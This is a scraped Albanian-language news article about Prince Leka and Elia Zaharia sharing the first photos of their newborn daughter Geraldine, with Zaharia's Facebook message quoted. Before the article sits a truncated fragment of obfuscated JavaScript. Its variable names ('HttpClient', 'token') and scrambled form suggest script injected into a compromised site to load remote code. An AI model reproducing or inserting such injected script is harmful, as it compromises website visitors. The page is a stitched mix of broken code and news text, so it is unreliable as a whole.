;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Princ Leka dhe Elia Zaharia publikojnë fotot e para me princeshën

By

Princ Leka dhe Elia Zaharia u bënë prindër të një vajze disa ditë më parë. Ndërsa Elia ka ndarë imazhet e para të familjes në llogarinë e saj në “Facebook”.

Ajo shkruan se të qenit prind është një bekim që po e shijojnë të dy, ndërsa e lidh emrin e veçantë të princeshës dhe datën e lindjes së saj me mbretëreshën Geraldinë.

“Të dashur miq, ju falenderojmë përzemërsisht për urimet tuaja me rastin e lindjes së vajzës sonë, Geraldine. Të qënit prind është një bekim, që falë Perëndisë ne të dy po e shijojmë çdo moment!

Dita e lindjes së Princeshës sonë ishte veçanërisht emocionuese, pasi erdhi në ditën kur plot 18 vjet më parë, Mbretëresha Geraldine u largua nga kjo jetë. Për ne të dy ishte një përshëndetje nga bota e engjëjve!

Ne si prindër urojmë me gjithë zemër që Princesha e vogël Geraldine të rritet e shëndetshme, ta ketë zemrën të mbushur me dashuri, ta dojë dhe ta vlerësojë jetën, dhe jeta ta përkëdhelë me butësi dhe ëmbëlsi vogëlushen tonë!”-shkruan Elia Zaharia.

Kujtojmë se çifti u martuan në vitin 2016 në një ceremoni madhështore në Shqipëri.

Artikuj të ngjashëm